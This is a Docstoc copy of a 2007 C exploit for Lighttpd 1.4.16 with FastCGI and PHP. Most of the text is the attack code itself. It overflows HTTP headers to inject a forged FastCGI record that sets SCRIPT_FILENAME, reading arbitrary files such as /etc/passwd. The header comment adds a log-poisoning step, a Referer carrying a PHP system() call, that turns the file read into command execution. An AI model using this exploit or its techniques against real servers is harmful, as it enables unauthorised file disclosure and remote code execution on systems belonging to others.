Docstoc

Lighttpd 1.4.16 FastCGI Header Overflow Remote Exploit

Document Sample
Lighttpd 1.4.16 FastCGI Header Overflow Remote Exploit Powered By Docstoc
					                                 Lighttpd 1.4.16 FastCGI Header Overflow Remote Exploit   Page 1/3
   1   /*
   2    * Remote Lighttpd + FastCGI + PHP example exploit
   3    *
   4    * Tested with Lighttpd 1.4.16 and PHP 5.2.4
   5    *
   6    * To avoid abuse there’s a "remove me" in the code.
   7    *
   8    * Example:
   9    *
  10    * # ./exploit localhost 80 /etc/passwd
  11    *
  12    * or
  13    *
  14    * # wget −−referer="<?php system(’/usr/bin/id’); ?>" localhost
  15    * # ./exploit localhost 80 /var/log/lighttpd/access.log
  16    *
  17    *
  18    * Mattias Bengtsson <mattias@secweb.se>
  19    *
  20    * http://www.secweb.se/
  21    *
  22    */
  23
  24   #include   <stdio.h>
  25   #include   <stdlib.h>
  26   #include   <string.h>
  27   #include   <unistd.h>
  28
  29   #include <sys/types.h>
  30   #include <sys/socket.h>
  31
  32   #include <netdb.h>
  33   #include <arpa/inet.h>
  34   #include <netinet/in.h>
  35
  36   int append_header(char *p, int c, int a, int b)
  37   {
  38           c = 0x41 + (c % 25);
  39
  40           memset(p, c, a + b + 4);
  41
  42           p[a   +   0   +   0]   =   ’:’;
  43           p[a   +   0   +   1]   =   ’ ’;
  44           p[a   +   b   +   2]   =   ’\r’;
  45           p[a   +   b   +   3]   =   ’\n’;
  46
  47           return a + b + 4;
  48   }
  49
  50   int network(const char *host, int port)
  51   {
  52           struct sockaddr_in addr;
Mattias Bengtsson                                                                         09/10/2007
                           Lighttpd 1.4.16 FastCGI Header Overflow Remote Exploit      Page 2/3
  53            struct hostent *he;
  54            int sock;
  55
  56            sock = socket(AF_INET, SOCK_STREAM, 0);
  57
  58            addr.sin_family = AF_INET;
  59
  60            if((he = gethostbyname(host)) == NULL)
  61                    return 0;
  62
  63            memcpy(&addr.sin_addr, he−>h_addr_list[0], he−>h_length);
  64
  65            addr.sin_port = htons(port);
  66
  67            connect(sock, (struct sockaddr *)&addr, sizeof(addr));
  68
  69            return sock;
  70    }
  71
  72    int main(int argc, char **argv)
  73    {
  74            char *b, *p;
  75            int sock, i;
  76            char tmp[1024];
  77
  78           if(argc < 4) {
  79                   fprintf(stderr, "Usage: %s <host> <port> <file>\n", argv[0]);
  80                   exit(0);
  81           }
  82
  83           sock = network(argv[1], atoi(argv[2]));
  84
  85           if(sock <= 0) {
  86                   fprintf(stderr, "Host down?\n");
  87                   exit(0);
  88           }
  89
  90            b = p = malloc(0xffff + 0xffff);
  91
  92           p += sprintf(p, "GET /index.php HTTP/1.1\r\n");
  93           p += sprintf(p, "Host: %s\r\n", argv[1]);
  94           p += sprintf(p, "A: A\r\nB: ");
  95
  96            *p++ = 128;
  97            *p++ = 0x00;
  98            *p++ = 0x54;
  99            *p++ = 0x42;
  100           *p++ = ’\r’;
  101           *p++ = ’\n’;
  102           p = 0x00;
  103
  104           p += append_header(p, 0, 4, 1);
Mattias Bengtsson                                                                      09/10/2007
                              Lighttpd 1.4.16 FastCGI Header Overflow Remote Exploit   Page 3/3
  105           p += append_header(p, 1, 200 , 25079);
  106
  107           p −= 3631;
  108
  109           *p++   =   1; // Version
  110           *p++   =   4; // Type
  111           *p++   =   0;
  112           *p++   =   0;
  113
  114           i = sprintf(tmp, "SCRIPT_FILENAME");
  115           sprintf(tmp + i, "%s", argv[3]);
  116
  117           *p++   =   0x00; // Length
  118           *p++   =   2 + strlen(tmp); // Length
  119           *p++   =   0x00; // Padding
  120           *p++   =   0x10;
  121           *p++   =   i; // name_len
  122           *p++   =   strlen(tmp) − i; // var_len
  123
  124           memcpy(p, tmp, strlen(tmp));
  125
  126           p += 3631 − 8 − 2;
  127
  128           p += append_header(p, 2, 200, 40007);
  129           p += sprintf(p, "\r\n\r\n");
  130
  131           write(sock, b, (p − b));
  132
  133           i = read(sock, b, 0xffff);
  134           *(b + i) = 0;
  135
  136           printf("%s\n", b);
  137
  138           free(b);
  139           close(sock);
  140
  141           return 0;
  142   }
  143
  144   // milw0rm.com [2007−09−10]




Mattias Bengtsson                                                                      09/10/2007

				
DOCUMENT INFO
Shared By:
Categories:
Stats:
views:404
posted:5/24/2010
language:Vietnamese
pages:3